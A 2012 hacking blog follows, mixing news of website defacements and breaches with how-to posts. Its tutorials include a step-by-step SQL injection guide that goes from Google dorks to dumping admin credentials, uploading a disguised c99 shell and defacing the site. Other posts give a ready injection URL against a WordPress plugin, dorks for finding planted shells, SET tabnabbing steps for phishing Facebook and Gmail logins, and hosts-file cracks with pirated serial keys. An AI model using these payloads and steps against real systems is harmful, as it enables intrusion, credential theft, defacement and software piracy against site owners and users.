Rabu, 18 April 2012

Protect Blog From Hacker

Personal News Magazine - For a blogger, threats from a hacker are a very real possibility. Everyday there are so many blogs around the World Wide Web, which is hacked by hackers. This causes havoc in the life of the blogger since he loses all his work and a source of revenue from the blog. A blog is especially vulnerable to hackers if they have a good Google Page Rank, Alexa Rank etc. In other words, a popular blog is more at risk of getting hacked. In this post I have mentioned a few minor tips for you to protect yourself from malicious hackers who can rob you of all your work.

1. Anti-virus
Always have a trusted and regularly updated Antivirus installed in your system. There are many great Antiviruses available such as McAfee, Symantec etc. to name a few. Make sure that all the updates of the Antivirus are installed so that it can be on top off the latest threats that are lurking the internet. Many Trojans and malwares can gain access into your system and thereby your personal information if you have weak protection from your Antivirus. Having an effective and updated Antivirus is the mosty basic step to ward off hackers.

2. Password
Many bloggers wish they had made their password stronger and more complicated. Unfortunately, for many it become too late because their blog usually has already been hacked. Completely avoid using your name, celebrities or any particular word. Hackers aim at the victim's password most of the time to hack into their blogs. So as a preventive measure always make use of long, abstractive and alphanumeric passwords for your login credentials. This will help you enhance your online security a long way. And of course, other basic precautions include never sharing your password with anybody except of course those on your team or whom you trust personally.

3. Ethical Hacking
If you think that you have hack-proofed your blog then may be you would want to test it. Especially if your blog is authoritative then there is a high possibility for hackers to target your blog, in that case you should test your blog for vulnerability against hackers. You can do this by hiring ethical hackers who would be carrying out test attacks for you, they can thereon offer suggestions for further improvement for your security against hackers.



Article Source: http://EzineArticles.com/5009459

Rabu, 21 Maret 2012

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the wordpress website.
1. Open google and search inurl:Editor/assetmanager/assetmanager.asp
2. Now open any result you will found look like bellow snapshot.
3. Just click on browse and upload your deface page.

wordpress hacking

Demo: Asset Manager Deface page

Minggu, 18 Maret 2012

Hacking GSM Mobile Network in India








A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated.

Four founding members of a company called Matrix Shell say they have worked out a way to hack into India GSM phone numbers and make calls from them. They were able to use the unique SIM card number called International Mobile Subscriber Identity (IMSI) of their target victims.

Hack facebook account and Gmail account using Backtrack 5

In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Backtrack5 1

Now Open social Engineering Tool kit (SET) ./set
backtrack5 2

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
backtrack5 3

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
backtrack5 4

Then select 2nd option “Site Cloner” and Hit ENTER
backtrack5 5

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
backtrtack5 6

Now just hit the enter.
backtrack5 6

Open new terminal and just type ifconfig and hit ENTER
backtrack5 9

Now just copy this IP address and open it in Browser.
backtrack5 7

Now here I am just typing test email and password to see whether it works or not.
backtrack5 8

Now just hit enter and switch back to our terminal and we found the Email and password !
backtrack5 10

This tutorial is just educational purpose only.

Sabtu, 17 Maret 2012

5 Simple Hacks to Prank your friends


1. Crash a Computer System With Nothing But a URL!I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.WARNING: CLICKING ON

Jumat, 16 Maret 2012

How to hack cell phones/ mobiles ?


# 1 -- Physical Access to the Phone -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account.

#2 -- Hacking Email, Twitter and Apps -- Most celebrities are hacked through email, Twitter and other accounts that

Kamis, 15 Maret 2012

BBC hack attack linked to the Iranians






The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country.






The BBC has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator.

The global media company believes adistributed denial of service (DDoS) attack was the reason for its outlets across Persia falling down

Rabu, 14 Maret 2012

Electronic voting system hacked









(AFP Photo / Joe Raedle)



When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days.The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online

Chinese Hack BAE to learn about F-35



This plane will have taken more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way? 
More Info on:
http:/

Maxsqli syntax maker tool

maxsqli syntax builder

This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method. you can see the tool in the above snapshot.
Download it from here

Selasa, 13 Maret 2012

Control an Arduino from your Android device using a cheap bluetooth module


Check out this new instructable which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay.



This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see: http://code.google.com/

Find Shells Using "Index of /sh3llZ" Google Dork

shells

After getting the admin access hackers are Uploading their control penal (that’s call shell). Shell allows hackers to hack/deface the website and using the shell hacker can get root access. Sometime hackers left the shell in vulnerable sits. And here is some Google dorks which helps you to find the shells.

intitle:index of/sh3llZ

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php

You can see in the above figure there are some shells like c99.php , c100.php etc. using that shell u can upload your shell and you can also deface that site.

Credits:
Devils cafe

Senin, 12 Maret 2012

Daily Attack Round Up Annoymous hacks Vatican and 'The Consortium' Attacks Porn Site



The following two hacking attacks are been reported in the news today.



- Anonymous has hacked the Vatican for a second time. The website for the Catholic Church,vatican.va, is currently down. Unlike the first hack, which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio,

Minggu, 11 Maret 2012

Crack Adobe Photoshop CS5 Extended Manually

PS_CS5_Extended_3in_boxshot

Adobe Photoshop CS5 Extended is the professional software for graphics designers and its very helpful in image editing. But the thing is that Adobe Photoshop CS5 Extended is not freeware it means they are just providing the trial version for 30 days after that it will ask you for serial key. If you have used Adobe Photoshop CS5 Extended then you may know that its not allowing fake serial key so we need to crack Adobe Photoshop CS5 Extended. For that just follow the simple steps.

1. go to C:\Windows\System32\drivers\etc
2.now double click on HOSTS file and paste the following code in to that file.

127.0.0.1 hl2rcv.adobe.com
127.0.0.1 adobeereg.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 hh-software.com
127.0.0.1 www.hh-software.com
127.0.0.1 activate.adobe.de
127.0.0.1 practivate.adobe.de
127.0.0.1 ereg.adobe.de
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 wip3.adobe.de
127.0.0.1 3dns-3.adobe.de
127.0.0.1 3dns-2.adobe.de
127.0.0.1 adobe-dns.adobe.de
127.0.0.1 adobe-dns-2.adobe.de
127.0.0.1 adobe-dns-3.adobe.de
127.0.0.1 ereg.wip3.adobe.de
127.0.0.1 activate-sea.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 hl2rcv.adobe.de
127.0.0.1 nero.com
127.0.0.1 www.nero.com
127.0.0.1 activate.nerao.com
127.0.0.1 www.activate.nero.com
127.0.0.1 nero.de
127.0.0.1 www.nero.de
127.0.0.1 activate.nero.de
127.0.0.1 www.activate.nero.de
127.0.0.1 validation.sls.microsoft.com


3. After that save that file. If its not allowing you to save that file then read our previous tutorial in that I have explained how to give write permission to hosts file.

4.Now open Adobe Photoshop CS5 Extended and just enter this serial key

1330-1245-8292-4567-6480-4584

And press Ok after that it will not ask you for serial key.


A team from a French security firm hacked Microsoft's Internet Explorer 9 (IE9) yesterday at 'Pwn2Own', making it two browsers busted in two days at the annual contest.Also on Thursday, Google patched Chrome to fix two vulnerabilities that a long-time contributor to its bug bounty program used the day before to win $60,000 at 'Pwnium', Google's first-ever hacking event.


http://pcworld.co.nz/

Sabtu, 10 Maret 2012

Pakistan defence got hacked and defaced by ro0t_d3vil

hacked by root devil

Once again Pakistan cyber space hit by Indian hacker , this time ro0t_d3vil from team INDISHELL have hacked and defaced Pakistan deface department's official site ! And the interesting thing is this site have 13,042 global rank and 331 in Pakistan.

And he have written awesome sentence in the deface page “This thing happens when you hire professionals with good marks nd not with good brains :) - ro0t_d3vil

Here is the hacked website and its mirror

http://www.defence.pk/ica.html

http://www.arab-zone.net/mirror/117127/defence.pk/ica.html

17 Countries Defense Ministries Hacked and defaced by ro0t_d3vil

hacked by root devil

Once again cyber space hit by Indian Hacker , this time ro0t_d3vil from team INDISHELL have hacked and defaced 17 Countries Defense Ministries !! so we can say that no once is secure !!

you can see the list of hacked website here

Jumat, 09 Maret 2012

Indian Server Rooted 350+ Indian Sites Got Hacked

indian sites got hacked

Pakistani hacking group named Pakistan Cyber Pyrates have gained the root access on the server and they have hacked and defaced more then 350 Indian sites. According to their deface page they want freedom of Kashmir and palestine.

You can see the list of hacked websites here.

Crack Any Latest Version Of Internet Download Manager IDM

internet download manager idm crack

Internet Download Manager ( IDM ) is the best download manager all we know but its not freeware means they are just providing the trial version for 1 month and after that IDM will ask for the serial key. without Original serial key IDM will not work. Because whenever you enter the serial key it will verify with its database and after that it will accept the serial key. so we need to crack it manually so just follow the simple steps.

1. Go to C:\Windows\System32\drivers\etc now you can see some files are there and double click on hosts file and open it with notepad.

idm 2

2. You can see how its look like.

idm 9

Now just paste this code after localhost

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com


And save it . But if you are windows7 user then it will not allow you to make a change in that file , and I have also solution for that .

3. Right click on hosts file and select security tab (I have hide my user name)

idm 3

4. Now select USERS after that click on EDIT

idm 4
5. You can see one dialog box will open and in that select users

idm 5
6. Now you can see we don’t have write permission now just select full control.

idm 6
7.After that just simply click OK

idm 7
8.And one dialog box will open in that just press yes.

idm 8
Now you can save hosts file in windows 7. and after that add this serial key.

HUDWE-UO689-6D27B-YM28M

and click ok and you have done !

you can see my full version of IDM.

idm crack

Kamis, 08 Maret 2012

Hack WordPress Blog in easy way

In this tutorial I am going to show you how to hack wordpress blog in easy was so just follow the simple steps.

1. Open google and search inurl:"fbconnect_action=myhome"

2. Now open any link from the search result .

3. After opening the link just change this part of the URL ?fbconnect_action=myhome&userid= with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

after that just hit enter you will see the admin id and hash (see the bellow snapshot ) now just decrypt the hash with md5 cracker and you have done !

wordpress blog 2

Rabu, 07 Maret 2012

How to Enable Telnet in Windows 7

telnet windows 7

In this tutorial I am going to show you how to enable telnet in windows 7 OS and there are also some hidden applications in the windows 7 professional like games , telnet etc. if you have used windows 7 professional then you may found that there is no game option. because by default its disabled by windows 7 so you need to enable the telnet manually. (if you want to enable the games in windows 7 professional then there is also options for game just follow the simple steps )

1.Open control pen
2.Click on programs and features.
3.Now at the left side you can see the “ turn windows features on or off ” option. (see the bellow snapshot.)

telnet windows 7 1

4.Now just select telnet client and telnet server and hit ok and you have done !

telnet windows 7 2

If you want to enable the games then there is a first option of games just mark it and hit ok and you have Done !

Selasa, 06 Maret 2012

Sql Poizon ~ Sqli Exploit Scanner Tool

Sql Poizon ~ Sqli Exploit Scanner Tool

Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.

sql tool

You can see above snapshot how it will find the sql vulnerable sites.
You can download Sql Poizon here

Sabtu, 03 Maret 2012

Download Windows 8 Consumer Preview ISO [32 & 64 Bit]

Windows 8 Consumer Preview is finally available for download . Earlier Microsoft released the developer preview which was available to download publicly. Now this time they have fixed thousands of issues and released the new edition which surely has a lot less bugs.

Before downloading the new release keep in mind that this is a Beta version that might have some bugs or issues your system will work fine but some application might not support.

There are many more features in the windows 8 !

Capture

The download links are as follow.

Download Windows 8 Consumer Preview (32-bit) [filesize: 2.5 GB ]
Download Windows 8 Consumer Preview (64-bit) [filesize: 3.3 GB]

Minggu, 26 Februari 2012

Hacking books collection

hacking Books copy

Here I am sharing 5 most important Books for beginners and this books are perfect to learn for beginners and the books are hackers underground handbook , gray hat hacking 2nd edition , gray hat hacking 3rd edition , GPS hacking , Metasploit E-book these books are most important for noobs. It involves all the basic hacking tutorials like phishing , keylogging , sqli and many more tutorials.

The download links are as follow

download now !!

Rabu, 22 Februari 2012

Advance sql injection video tutorial download

sql_injection

Sql injection is the most conman webapplication vulnerability. and here I am sharing the advance sql injection vide tutorial. You can download before this post I have shared the basic sql injection now here I am sharing the video tutorial of the advanced sql injection.

You can download video tutorial here.

Minggu, 19 Februari 2012

Drupal Security Scanner Released

Drupal Security Scanner Released

drupal copy

Ali Elouafiq have released their first Security scanner for Drupal CMS on his blog. This tool is public and it will help hackers or pentester to do their job faster. Here I am showing you how to use this tool. After downloading the python script (download link provided at the end of the post.) you just simply type :

> python DPScan.py [web url]

you can download script from here.

Selasa, 14 Februari 2012

Fake news strikes the Cyber space

File

Recently a news posted by news portals like Deccan chronicals India wires. claiming 20k sites of India hacked by Bangla hackers as we read the content posted by these news portals we observe that they don't post any link linking to any list or mirrors of sites hacked they just post that news on the behalf of a Facebook page post by Bangla hackers actually Bangla hackers post on there Facebook page that they have hacked 20k sites without showing any list or mirrors so we investigate. and we find some shocking things actually bdhackers have not hacked more than 2000 sites with 1465 defacements and other ddos attack they claim to have problems with Indian govt. But they unable to hack a single govt. Site.

They also claims a shocking thing and news portal post it as eyes closed BD hackers claim that Indishell hacker Ash3ll have left the cyber space but Ash3ll is active on Facebook too.

The claims are all fake by BD hackers and news portals with closed eyes posted the news.(you can see that news here.) BD hackers also claims that Indiana hack there 400 sites but in private chat with Ash3ll we find that Indians haven't hack more than 200 sites and all they hacked are gov related sites according to Ash3ll Indians don't want to hack any innocent from Bangladesh he comments that because of some kids they are not going to hack innocents.

Indishell have hacked only .gov sites because they don't like to hack any innocent sites. you can see the mirrors of hacked Bangla websites by indishell here.

Sabtu, 11 Februari 2012

1000+ indian sites got Hacked By Shadow008 and H4x0rL1f3

1000+ indian sites got Hacked By Shadow008 and H4x0rL1f3

45

1000+ indian sites got Hacked By Shadow008 from pakistani hacker. you can see the message of deface page in this figure.

23

you can see the list of hacked sites here.

100+ Indian sites got hacked by Shadow008 and H4x0rL1f3

100+ Indian sites got hacked by Shadow008 and H4x0rL1f3

2

Pakistani hacker have attacked Indian cyber space and hacked 100+ Indian sites. And the message of defacepage is as follow.

23

You can see the list of hacked websites here.

150+ Bangla sites got hacked and Freezed by INDISHELL

Expire cyber army from Bangladesh are hacking Indian sites. And Indian cyber army (Indishell) have good relations with Bangladesh and they have promised Bangladesh that they will not hack Bangladeshi websites. But day by day they are hacking more and more Indian sites so Indian cyber Army (Indishell) have announced a cyber war between Bangladesh and India. And Indishell have hacked and freezed more then 150 Bangladeshi websites. The list of the hacked website is provided at the bottom of the post.

1

The list of hacked websites are here.

Senin, 06 Februari 2012

SQL INJECTION (From start to Defacement)

Here I am going to tech you how to hack website using sql injection. Follow the steps

sqlinjection

FINDING THE TARGET AND GETTING THE ADMIN PASSWORD.

First we should find our target website for that you can use this DORKS.

I am mostly using “ inurl:php?id= ”and giving you some dorks here copy any one and paste it in google and search. click here for more dorks.

Check for vulnerability.

well assume that we have one site like this

http://www.site.com/news.php?id=5

Now to test if its valuable we need to add (quote)after the end of url.

and that will be http://www.site.com/news.php?id=5’

after that hit Enter and if you got some error or if you found some missing content or missing pictures that means its vulnerable to sql injection.

Find the number of columns.

To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2)(
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)
Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
i didn't see any paper covering this problem, so i must write it :)
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version :D
Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases. common table names are: user/s, admin/s, member/s.
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
we know that table admin exists. now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc. now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up :)
i.e md5 hash, mysql hash, sha1. now we must complete query to look nice for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon) (there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash when you have this, you can login like admin or some superuser. if can't guess the right table name, you can always try mysql.user (default) it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
MySQL 5
Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/*
note that i put 0,1 (get 1 result starting from the 0th) now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%201,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%202,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc. To get the column names the method is the same. Here we use column_name and information_schema.columns
the method is same as above so example would be.
http://www.site.com/news.php?id=5union%20all%20select%201,column_name,3%20from%20information_schema.columns%20limit%200,1/*
the first column is diplayed. the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5%20union%20all%20select%201,column_name,3%20from%20information_schema.columns%20limit%201,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc. if you wanna display column names for specific table use this query. (where clause)
let's say that we found table users.
i.e
http://www.site.com/news.php?id=5%20union%20all%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_name=%27users%27/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON. let's say that we found colums user, pass and email.
now to complete query to put them all together for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5%20union%20all%20select%201,concat%28user,0x3a,pass,0x3a,email%29%20from%20users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com

DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.

Now find the upload option and upload your shell (if you don’t have shell then click here to download)

some sites wont allow you to upload a php file. so rename it as c99.php.gif then upload it.
after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir) find the c99.php.gif and click it now you can see a big control pannel.
now you can do what ever you want to do.
search for the index.html file and replace it with your own deface page. so if any one goes to that site they will see your page.

And you have did !! hope this tutorials helped you a little.

Happy hacking Smile

Kamis, 26 Januari 2012

100+ pakistani website got hacked by ICA-INDISHELL

Capture

Once again Pakistani cyberspace hit by ICA-INDISHELL.This time FfeSsxt Prince, H3r0 and Magnum Sniper have hacked 40+ pakistani websites. The message they have posted on the defacepage is as follow
We arent afraid of any shit that comes to us !! We'll Do anything to Keep our Country's Pride Up and High !! Jihaad = War = Shit. One Person gives u bayaan on Jihaad and encourages you to kill people and says "ye sawaab ka kaam hai","rizzak ka kaam hai" and you do sins even without thinking the consequences !! But you Dony Know Tht Terrorism is unnecessary violence against innocent civilians; Qur'aan forbids this. You have read the Qur'aan, you should know this & yet if you are supporting Terrorism means you are'nt Muslim.We are Proud of People we have in India who are ready to deal with any such incidents !! Officers, Soldiers who are ready to die for their Motherland .

they have posted the list of websites on pastebin.

click here to see the list

Selasa, 24 Januari 2012

FTC OWNED BY ANTISEC

FTC OWNED BY ANTISEC

After the Library of Congress , FTC OWNED BY ANTISEC due to SOPA / PIPA / ACTA .
They have posted the message on paste-bin “ If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company websites. As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers,getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain't even trying to step to this.”


ftc_logo copy
You can see leaked data here

Zone-H Hacked

35jzaddThe leading deface mirroring website (www.zone-h.com) has been hacked by HcJ & Cyb3R-1sT & Egyptian.H4x0rZ & Sas-TerrOrisT & H311 c0d3 & Red Virus
The hackers claimed that they rooted the server hacking:
www.zone-h.com
www.zone-h.org
www.zone-h.com.br
forum.zone-h.com.br
br.zone-h.org
www.zone-h.net
The Hacker had added this message on there deface:

                                                                   "To be OR not TO be

Note : It's Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It's Unacceptable when we tried to notify defaced.zone-h.net and found this message " nice try" it's not a try it's a real! your server rooted, all the websites hacked, all people knew that ! and it's the third time to hack your websites 2 of them in 2010( 2010/04/02 > brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers
to notify your sites, it's the real courage !"

The reason they gave was that zone-h didnt submit the deface of their own website (defaced.zone-h.net) giving the message " Nice Try "

This isn't the first time zone-h is being hacked, it has been hacked before in 2010 as well .

Sabtu, 21 Januari 2012

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD

mega

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD. Fbi have shutdown the megaupload due to SOPA and the Anonymous have ddosed FBI.gov after that today SECTOR 404 have hacked Library of Congress you can see the leaked data here.